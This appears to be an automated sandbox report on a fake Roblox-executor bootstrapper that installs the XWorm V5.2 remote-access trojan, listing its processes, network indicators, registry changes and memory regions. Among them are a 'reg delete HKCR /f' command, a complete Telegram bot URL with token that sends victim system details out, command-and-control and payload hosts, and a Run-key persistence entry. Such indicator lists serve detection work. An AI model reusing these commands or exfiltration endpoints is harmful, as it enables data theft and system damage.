"C:\Windows\System32\cmd.exe" /k reg delete HKCR /f
malicious
C:\Users\user\AppData\Roaming\explorer.exe
C:\Users\user\AppData\Roaming\explorer.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7376 -s 2148
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\reg.exe
reg delete HKCR /f
C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
"C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6524 -s 1264
There are 25 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://api.telegram.org/bot
unknown
malicious
https://api.telegram.org/bot8013268995:AAHt5-BJsAIEM9hnoTy17y1WYC4NnCMU398/sendMessage?chat_id=5405936031&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A58ABE3825259C230781C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208TH9_M1_S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2
149.154.167.220
malicious
127.0.0.1
malicious
cash-hispanic.gl.at.ply.gg
malicious
http://127.0.0.1:6463
unknown
https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
172.66.44.59
http://www.nodejs.org
unknown
https://79c62fd6.solaraweb-alj.pages.dev
unknown
https://go.microsoft.co
unknown
http://crl.microsoft
unknown
https://contoso.com/License
unknown
https://ncs.roblox.com/upload
unknown
https://www.nodejs.org
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw
unknown
https://aka.ms/vs/17/release/vc_redist.x64.exe
unknown
http://79c62fd6.solaraweb-alj.pages.dev
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://pastebin.com/raw/ZESVzSgK
172.67.19.24
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
104.20.23.46
https://getsolara.dev/api/endpoint.jsonChttps://pastebin.com/raw/ZESVzSgK
unknown
https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw
unknown
http://crl.micft.cMicRosof
unknown
http://www.microsoft.c
unknown
http://127.0.0.1:6463/rpc?v=1
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://nodejs.org
unknown
http://nuget.org/NuGet.exe
unknown
https://discord.com
unknown
https://synapsexdocs.github.io/custom-lua-functions/console-functions/)
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://crl.mic
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://getsolara.dev/asset/discord.json
104.21.93.27
https://github.com/Pester/Pester
unknown
http://james.newtonking.com/projects/json
unknown
http://edge-term4-fra4.roblox.com
unknown
http://getsolara.dev
unknown
https://discord.com;http://127.0.0.1:6463/rpc?v=11
unknown
https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
128.116.44.3
https://g.live.com/odclientsettings/Prod/C:
unknown
https://getsolara.dev
unknown
https://getsolara.dev/api/endpoint.json
104.21.93.27
http://127.0.0.1:64632
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://www.newtonsoft.com/jsonschema
unknown
https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson
unknown
https://aka.ms/pscore68
unknown
http://nodejs.org
unknown
http://clientsettings.roblox.com
unknown
http://pastebin.com
unknown
https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
unknown
https://pastebin.com
unknown
https://pastebin.com/raw/pjseRvyK
unknown
https://clientsettings.roblox.com
unknown
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c
unknown
There are 51 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cash-hispanic.gl.at.ply.gg
147.185.221.23
malicious
api.telegram.org
149.154.167.220
malicious
pastebin.com
172.67.19.24
malicious
clientsettings.roblox.com
unknown
malicious
settings-ssl.xboxlive.com
unknown
malicious
edge-term4-fra4.roblox.com
128.116.44.3
nodejs.org
104.20.22.46
getsolara.dev
104.21.93.27
79c62fd6.solaraweb-alj.pages.dev
172.66.44.59
www.nodejs.org
104.20.23.46

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
172.67.19.24
pastebin.com
United States
malicious
147.185.221.23
cash-hispanic.gl.at.ply.gg
United States
malicious
127.0.0.1
unknown
unknown
malicious
104.21.93.27
getsolara.dev
United States
172.66.44.59
79c62fd6.solaraweb-alj.pages.dev
United States
128.116.44.3
edge-term4-fra4.roblox.com
United States
104.20.23.46
www.nodejs.org
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\58ABE3825259C230781C
9BCF8DFC92BC643B9414A446DA4632050DE1B7577FEDF4F7711D3B4B3D46E06D
HKEY_CURRENT_USER\SOFTWARE\58ABE3825259C230781C
B0CCB9A2BEF7FD24D7F31BB70A8516129A099B47D2564F9F18CB0D87144FC5DA
HKEY_CURRENT_USER\SOFTWARE\58ABE3825259C230781C
F6B78AFDC14A3C9CC6A54A54B8BEF95631E59B47A712FFE2BC416F5F223D329B
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
FileDirectory
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
ProgramId
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
FileId
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
LowerCaseLongPath
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
LongPathHash
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
Name
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
OriginalFileName
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
Publisher
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
Version
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
BinFileVersion
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
BinaryType
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
ProductName
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
ProductVersion
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
LinkDate
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
BinProductVersion
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
AppxPackageFullName
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
AppxPackageRelativeId
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
Size
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
Language
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\GeneralSettings
LegacyConfigSettingsUserId
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\MediaStore
LastOpenedDatabaseUserId
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
AppActivationKind
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
EnabledFeatures
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
NavPaneWasCollapsed
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
AppVolume
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
PlayerIsMuted
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\GeneralSettings
HasLaunched
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
CurrentEdpUiPolicyState
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
CurrentNowPlayingQueueTrackId
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\GeneralSettings
CollectionBuildingTotalLocalItems
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\GeneralSettings
CollectionBuildingTotalCloudItems
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
RateAndReviewPromptShown
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
RateAndReviewLastUsedRuleset
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Marketplace
MarketplaceCulture
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet Settings\Cache\Content
CachePrefix
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet Settings\Cache\Content
CacheVersion
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet Settings\Cache\Content
CacheLimit
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet Settings\Cache\Cookies
CachePrefix
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet Settings\Cache\Cookies
CacheVersion
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet Settings\Cache\Cookies
CacheLimit
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet Settings\Cache\History
CachePrefix
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet Settings\Cache\History
CacheVersion
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet Settings\Cache\History
CacheLimit
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\GeneralSettings
LastVersionOfBackgroundTaskRegistered
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
CurrentSeekPosition
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
LastSignedInUserId
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
LastSignInAccountRegion
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
LastSignedInUserExplicitPrivilege
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
LastSignedInUserCid
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
LastSignedInUserSignInName
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
LastSignedInUserFirstName
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
LastSignedInUserLastName
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
LastSignedInUserBrowseAge
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
LastSignedInUserUseAge
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
ConfigLastDownload
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\FUE
ShowFUE
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Music
LastSelectedCollectionPage
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
LastUsedAppNavigationMonikerData
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
AppActivationKind
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
AppVolume
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
CurrentEdpUiPolicyState
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
CurrentNowPlayingQueueTrackId
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
LastSignedInUserId
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Marketplace
MarketplaceCulture
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
EnabledFeatures
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
CurrentEdpUiPolicyState
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
CurrentSeekPosition
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
CurrentSeekPosition
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
CurrentSeekPosition
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
CurrentEdpUiPolicyState
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
NavPaneWasCollapsed
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
ProgramId
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
FileId
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
LowerCaseLongPath
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
LongPathHash
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
Name
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
OriginalFileName
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
Publisher
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
Version
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
BinFileVersion
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
BinaryType
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
ProductName
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
ProductVersion
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
LinkDate
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
BinProductVersion
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
AppxPackageFullName
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
AppxPackageRelativeId
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
Size
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
Language
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
Usn
There are 130 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
26A1000
trusted library allocation
page read and write
malicious
2AC9000
trusted library allocation
page read and write
malicious
1E9E40E4000
heap
page read and write
malicious
752000
unkown
page readonly
malicious
7FF848B13000
trusted library allocation
page execute and read and write
207DCB43000
heap
page read and write
53A2000
trusted library allocation
page read and write
207E0285000
heap
page read and write
C09000
heap
page read and write
CB0000
heap
page read and write
207DC5F0000
trusted library allocation
page read and write
1D99E7DB000
heap
page read and write
1D47DD46000
heap
page read and write
C4BF6FE000
stack
page read and write
207DDDA1000
heap
page read and write
207D0DDA000
heap
page read and write
1DA63140000
heap
page read and write
1AC8CBA0000
trusted library allocation
page read and write
207DCB89000
heap
page read and write
7FF848F10000
trusted library allocation
page read and write
1D99EF99000
heap
page read and write
1C468000
heap
page read and write
207DE247000
heap
page read and write
1D4655F0000
trusted library allocation
page read and write
1C1EC000
stack
page read and write
207DD5FB000
heap
page read and write
207D0C63000
heap
page read and write
1D465670000
heap
page read and write
20026149000
trusted library allocation
page read and write
201AAF60000
heap
page read and write
207D5C19000
heap
page read and write
207DD760000
unkown
page readonly
210D3B20000
heap
page read and write
1C972513000
heap
page read and write
207E0303000
heap
page read and write
2EF957E000
unkown
page readonly
222345FF000
heap
page read and write
1D99EA65000
heap
page read and write
D23D1FF000
stack
page read and write
207DE3E5000
heap
page read and write
C87000
heap
page read and write
207E022B000
heap
page read and write
14631280000
trusted library section
page readonly
2BF9D0A0000
trusted library allocation
page read and write
7FF848EF0000
trusted library allocation
page read and write
22236010000
heap
page read and write
22234682000
heap
page read and write
207DC7C0000
unkown
page readonly
1D99E8A9000
heap
page read and write
7FF848CB0000
trusted library allocation
page read and write
20035F41000
trusted library allocation
page read and write
7FF848BCC000
trusted library allocation
page execute and read and write
2EF947B000
stack
page read and write
207DDC20000
heap
page read and write
1DA74F2D000
trusted library allocation
page read and write
1D99EE84000
heap
page read and write
7FF848B3D000
trusted library allocation
page execute and read and write
204AA7E000
stack
page read and write
D142B7E000
stack
page read and write
7FF848CC2000
trusted library allocation
page read and write
BAB5FFE000
stack
page read and write
207D2ED0000
heap
page read and write
F7E9EE8000
stack
page read and write
7FF848D90000
trusted library allocation
page read and write
207DC670000
trusted library allocation
page read and write
1DA630B5000
heap
page read and write
1C843000
heap
page read and write
7FF848E59000
trusted library allocation
page read and write
207DE100000
heap
page read and write
D0799DE000
stack
page read and write
1DA65D45000
trusted library allocation
page read and write
201C5360000
heap
page read and write
524E000
trusted library allocation
page read and write
E50000
heap
page read and write
2BF9CE6C000
heap
page read and write
2BF9CE8D000
heap
page read and write
1C2F0000
heap
page read and write
247BDC00000
heap
page read and write
1E9E6454000
heap
page read and write
12D5000
heap
page read and write
7FF848B33000
trusted library allocation
page execute and read and write
1DA65CB6000
trusted library allocation
page read and write
1D99E8A9000
heap
page read and write
207D5D41000
heap
page read and write
1B4E3000
heap
page read and write
1D99EA58000
heap
page read and write
7FF848CD2000
trusted library allocation
page read and write
F7ECCFB000
stack
page read and write
20025FA1000
trusted library allocation
page read and write
207DDF80000
remote allocation
page read and write
1D99F0C6000
heap
page read and write
1D99EE41000
heap
page read and write
1C972516000
heap
page read and write
7FF848D80000
trusted library allocation
page read and write
7FF848DB0000
trusted library allocation
page read and write
247BD93C000
heap
page read and write
207DD4BE000
heap
page read and write
1D99E9A2000
heap
page read and write
7FF848B30000
trusted library allocation
page read and write
1D99E89F000
heap
page read and write
1DA65C26000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
1E9E20B7000
heap
page read and write
207E0264000
heap
page read and write
207DCF7F000
heap
page read and write
201BCE0B000
trusted library allocation
page read and write
207E0423000
heap
page read and write
1C972533000
heap
page read and write
2BF9EB4C000
trusted library allocation
page read and write
1D99E85B000
heap
page read and write
1DA664D4000
trusted library allocation
page read and write
7FF848C50000
trusted library allocation
page execute and read and write
